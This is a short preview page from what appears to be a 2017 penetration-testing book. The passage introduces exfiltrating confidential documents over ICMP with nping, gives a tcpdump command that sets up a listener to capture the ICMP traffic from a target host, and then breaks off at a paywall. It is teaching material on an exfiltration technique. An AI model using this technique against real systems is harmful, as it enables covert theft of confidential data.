June 2017
Intermediate to advanced
510 pages
11h 35m
English
There are multiple ways to utilize the ICMP protocol to exfiltrate the files using any ICMP tool, such as Hping, nping, and ping. In this section, we will utilize the nping utility to perform the data exfiltration of confidential documents using the ICMP protocol.
In this example, we will utilize TCP dump to extract the data from the PCAP dump file by running the following in the Terminal, as shown in the following screenshot:
tcpdump -i eth0 'icmp and src host 192.168.1.104' -w importantfile.pcap

That enables the listener. Now the host, 192.168.1.104, is the target host that we are waiting to receive data ...
Read now
Unlock full access